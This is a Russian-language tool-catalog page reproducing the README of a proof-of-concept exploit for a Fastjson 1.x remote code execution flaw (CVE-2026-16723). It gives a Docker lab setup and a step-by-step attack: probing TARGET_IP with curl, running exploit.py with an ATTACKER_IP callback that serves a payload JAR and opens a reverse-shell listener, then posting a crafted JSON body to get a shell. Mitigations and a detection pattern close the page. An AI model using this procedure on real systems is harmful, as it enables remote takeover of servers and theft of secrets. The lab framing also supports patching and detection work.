Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-16723 — Эксплойт proof-of-concept для CVE-2026-16723 — уязвимости удалённого выполнения кода в Fastjson 1.x через @JSONType, с конструктором payload JAR и слушателем reverse-shell. | Kitploit
Инструменты/GitHubGitHub/yym8538/cve-2026-16723
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubyym8538/cve-2026-16723

CVE-2026-16723

Эксплойт proof-of-concept для CVE-2026-16723 — уязвимости удалённого выполнения кода в Fastjson 1.x через @JSONType, с конструктором payload JAR и слушателем reverse-shell.

Репозиторий
11 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


Обзор

CVE-2026-16723 — это уязвимость удалённого выполнения кода (RCE) в Fastjson 1.x (1.2.68 – 1.2.83). Когда Fastjson разбирает контролируемый злоумышленником JSON, специально сформированное значение @type превращается в поиск ресурса класса внутри checkAutoType. В исполняемом fat-JAR Spring Boot загрузчик классов разрешает это имя как URL jar:http:// и загружает удалённый JAR (SSRF), после чего загружает класс, несущий аннотацию @JSONType, даже несмотря на то, что AutoType отключён. Поскольку современные JDK / Tomcat отклоняют бинарное имя jar:http://, надёжный вариант помещает JAR в кэш JVM и перечитывает его через jar:file:/proc/self/fd/N, так что класс определяется и его статический инициализатор выполняется, обеспечивая выполнение кода. AutoType остаётся отключённым, и гаджет из classpath не требуется.


Уязвимые версии

КатегорияВерсия
УязвимыеFastjson 1.2.68 ≤ версия ≤ 1.2.83
ИсправленныеПерейдите на Fastjson 2.x (исправленного релиза 1.x нет)

Воздействие

  • Удалённое выполнение кода от имени сервисной учётной записи
  • Раскрытие секретов / учётных данных с хоста и из окружения
  • Полная компрометация уязвимого приложения

Окружение

Цель лабораторной работы — публичный интернет-магазин (Northwind Store), API поиска которого привязывает тело запроса с помощью Fastjson. Всё соответствует стандартным настройкам Fastjson по умолчанию: SafeMode выключен, AutoType выключен, упаковано как fat-JAR Spring Boot.

docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
ПредусловиеСостояние в этой лабораторной работе
Fastjson 1.2.68 – 1.2.831.2.83
Исполняемый fat-JAR Spring Bootда
Путь разбора JSON без аутентификацииPOST /api/products/search
SafeMode / AutoTypeпо умолчанию (оба выключены)

PoC

Атакующий и цель работают в одной сети Docker bridge, поэтому цель достигает атакующего как исходящее соединение (дополнительный порт не публикуется).

Шаг 1. Убедитесь, что цель доступна

curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

Шаг 2. Запустите эксплойт на машине атакующего

exploit.py собирает payload JAR, раздаёт его, запускает слушатель и выводит тело запроса. Требуется только адрес обратного вызова.

python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

Шаг 3. Доставьте payload

Вставьте выведенное тело в endpoint поиска (Burp Repeater или curl) и отправьте его. Запрос поиска — это обычная функция; специально сформировано только его тело JSON.

curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

Шаг 4. Подтвердите результат

Код выполняется от имени сервисной учётной записи. Получите флаг через полученную оболочку:

whoami

Меры защиты

  • Перейдите на Fastjson 2.x
  • Или используйте com.alibaba:fastjson:1.2.83_noneautotype
  • Или запустите JVM с -Dfastjson.parser.safeMode=true
  • Обнаружение: значения JSON @type, содержащие шаблоны jar:http или jar:file / /proc/self/fd

Анализ

  • KR:
  • EN:
Скачать инструмент